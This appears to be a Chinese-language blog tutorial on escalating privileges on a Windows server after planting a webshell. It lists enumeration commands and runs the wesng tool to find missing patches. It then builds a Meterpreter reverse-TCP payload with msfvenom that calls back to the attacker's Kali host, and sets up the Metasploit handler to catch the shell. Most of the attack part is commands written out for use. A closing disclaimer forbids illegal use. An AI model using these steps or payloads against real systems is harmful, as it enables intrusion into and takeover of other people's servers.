权限提升:溢出漏洞
权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权。
目录:
第一步:提权是我们已经有木马或其他的方法连接到web网站的目录了.
第五步:解压好文件,把我们刚刚下载下来的 系统信息文件 放到 wesng-master 中.
第六步:打开命令行,切换到刚刚下载溢出漏洞的工具的目录下.(wesng-master)
第九步:直接在网上搜索漏洞编号进行利用.(建议使用 msf 进行 提权)
第十二步:直接在我们的服务器上安装 msf .(这里测试我就直接有 kali 中的 msf 了)
第十三步:在 windows 操作系统执行程序,返回我们服务器( kali )
第十五步:网上搜索漏洞编号进行使用.(返回这个环境下进行使用漏洞提权)
免责声明:
严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。
windows 常用命令:
systeminfo //打印系统信息
whoami //获得当前用户名
whoami /priv //当前帐户权限
ipconfig //网络配置信息
ipconfig /displaydns //显示DNS缓存
route print //打印出路由表
arp -a //打印arp表
hostname //主机名
net user //列出用户
net user UserName //关于用户的信息
net use \SMBPATH Pa$$wOrd /u:UserName //连接SMB
net localgroup //列出所有组
net localgroup GROUP //关于指定组的信息
net view y127.0.0.1 //会话打开到当前计算机
net session //开放给其他机器
netsh firewall show config //显示防火墙配置
DRIVERQUERY //列出安装的驱动
tasklist /svc //列出服务任务
net start //列出启动的服务
dir /s foo //在目录中搜索包含指定字符的项
sc query //列出所有服务
sc qc ServiceName //找到指定服务的路径
shutdown /r /t 0 //立即重启
type file.txt //打印出内容
icacls “C:\Example" //列出权限
wmic qfe get Caption,Description,HotFixlD,InstalledOn //列出已安装的布丁 权限提升:溢出漏洞.
从 Web 环境中提权:
第一步:提权是我们已经有木马或其他的方法连接到web网站的目录了.(一般用一句话木马.)
第二步:进入终端 打印系统信息 保存到一个文件中.
systeminfo > systeminfo.txt
第三步:在目录中找到这个文件进行下载到我们的电脑上.(一般就在我们输入命令的那个目录上)
第四步:下载溢出漏洞的工具.(wesng-master)
GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation
第五步:解压好文件,把我们刚刚下载下来的 系统信息文件 放到 wesng-master 中.
第六步:打开命令行,切换到刚刚下载溢出漏洞的工具的目录下.(wesng-master)
第七步:执行溢出漏洞的查找.
python wes.py systeminfo.txt -o vuln1.csv
python :使用python
wes.py :是工具
systeminfo.txt //是我们刚刚从服务器下载的文件
-o vuln1.csv //是把这个结果保存到这个文件vuln1.csv中.
第八步:打开 我们把漏洞保存的文件.(vuln1.csv)
第九步:直接在网上搜索漏洞编号进行利用.(建议使用 msf 进行 提权)
第十步:生成一个后台程序(木马)
后台程序(木马):https://tianyuk.blog.csdn.net/article/details/123541093
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105
lport=4444 -f exe > bgxg.exe
// lhost=kali的IP地址
// lport=端口号(比如4444)
// -f exe > 文件名.exe
第十一步:把刚刚生成的程序 上传到要提权服务器 上.
第十二步:直接在我们的服务器上安装 msf .(这里测试我就直接有 kali 中的 msf 了)(二个服务器要可以互通)
msfconsole //打开 msf 命令
use exploit/multi/handler //加载模块
set payload windows/meterpreter/reverse_tcp
// payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样)
set lhost 192.168.0.105
//设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)
set LPORT 4444
//设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)
run //执行命令
第十三步:在 windows 操作系统执行程序,返回我们服务器( kali )
第十四步:查看权限.(是不是高权限),如果不是则 直接在网上搜索漏洞编号进行利用.(建议使用 msf 进行 提权)
getuid 
第十五步:网上搜索漏洞编号进行使用.(返回这个环境下进行使用漏洞提权)
